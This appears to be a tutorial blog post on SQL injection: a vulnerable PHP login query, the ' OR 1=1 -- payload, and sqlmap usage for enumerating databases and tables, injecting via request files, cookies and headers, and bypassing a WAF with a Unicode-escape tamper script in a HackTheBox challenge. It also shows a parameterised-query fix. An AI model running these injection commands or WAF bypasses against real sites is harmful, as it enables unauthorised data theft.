It's important to know how SQL and databases work before trying this out. This is a method to automate and speed up SQL injection attacks.
You can check the following link to learn more about it.
Another thing to note is that this only speeds up the process; it is not a replacement for learning how SQL injection (sqli) actually works.
There are two main places you can attempt sqli: in the URL and in a form.
I'll go over the basic structure of both and then explore the various parameters sqlmap has to offer.
SQL injection works manually as well. For example, take the PHP script below
(NOTE: it is similar in other languages such as Python):
$user = $_POST['username']; // untrusted value taken straight from the form
$sql = "SELECT * FROM login where username='".$user."';";
The ‘sql’ variable stores the sql query that is to be executed.
Effectively, if the HTML form's name field had the following entered,
Name: ' OR 1=1 --
The sql statement effectively becomes,
SELECT * FROM login where username='' OR 1=1 --
The “--” at the end comments out anything else.
If we were to then perform reconnaissance by stacking a second statement, such as
SELECT * FROM login where username=''; show tables;
we would have to do this by hand for every query. Doing this manually is very time consuming; sqlmap automates it.
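To see why the concatenated query above is exploitable, and what the fix looks like, here is an added Python example (not from the original post) that builds the same login table in an in-memory SQLite database, runs the vulnerable concatenation beside a parameterised version, and feeds both the ' OR 1=1 -- input; the table rows are constructed sample data.

```python
import sqlite3


def make_db():
    # Constructed sample data: a "login" table like the one in the PHP snippet.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO login VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def lookup_vulnerable(conn, user):
    # Same string concatenation as the PHP $sql line: the input becomes SQL,
    # so "' OR 1=1 --" turns the WHERE clause into a tautology and the
    # trailing quote is commented out.
    sql = "SELECT * FROM login where username='" + user + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user):
    # Parameterised query: the value is bound separately from the statement,
    # so quotes and comment markers inside it are data, never SQL syntax.
    sql = "SELECT * FROM login where username=?"
    return conn.execute(sql, (user,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    payload = "' OR 1=1 --"
    print(lookup_vulnerable(conn, payload))  # every row: the filter is always true
    print(lookup_safe(conn, payload))        # []: no user is literally named that
    print(lookup_safe(conn, "alice"))        # [('alice', 's3cret')]: normal use still works
```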
SQLMAP: In the terminal of your Parrot/Kali machine, run
sqlmap -u https://www.URLTOINJECT.com/listproducts.php?search=test
This works for websites like the one above that have search parameters in the URL.
For websites that use a form-like structure, which in my opinion is more common, the command needs to be adjusted as follows:
sqlmap -u https://www.URLTOINJECT.com/ --data="username=example&password=test"
The --data field holds the POST parameters you want to inject (separated with & as in a normal form body). Adding the following options does the following:
--method=POST  Set the HTTP method; GET or PUT can be used as needed
--current-db   Retrieve the current database
--dbs          Enumerate the databases
--tables       Enumerate the tables
--count        Retrieve the number of entries
-D             Select the database
-T             Select the table
Since writing this I have used sqlmap more, and I'm going to add more features that I've used.
Firstly, not every SQL injection is in a form or in the URL. So let's look at giving sqlmap a raw request. Say you captured a request from ZAP/Burp that needs to be tested.
-r is the option to use for a request file.
sqlmap -r request.txt -p user
request.txt
POST / HTTP/1.1
Content-Type: application/json
Host: docker.hackthebox.eu:31181
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Content-Length: 21
{
"user":"test"
}
This request is a POST request, but its body is JSON. This isn't really like form data being sent, because of the JSON formatting. -p tells sqlmap which parameter we are injecting. -r is good to use because you can then use it for scripting or to keep the URL separate from the bash command, as well as for attacking additional parameters. If you want to inject into a cookie or a header, use --cookie="cookiename=*" or --header. The * marks the injection point within the cookie value.
While doing wafwaf from HTB I had to bypass a web application firewall (WAF). It blocked most special characters and SQL keywords. The solution was to use the JSON Unicode escape format.
SELECT - plain UTF-8
\u0053\u0045\u004c\u0045\u0043\u0054 - Unicode escaped
The WAF would not allow select to run, but in the Unicode-escaped form it was not detected. To send all your payloads in this format, use the --tamper option:
sqlmap -r request.txt --tamper=charunicodeescape -p user
This essentially converts the payload to the Unicode format shown above. Tamper is not limited to this script alone; use the --list-tampers option to see what scripts are available for the situation when warranted.
Other parameters can be found below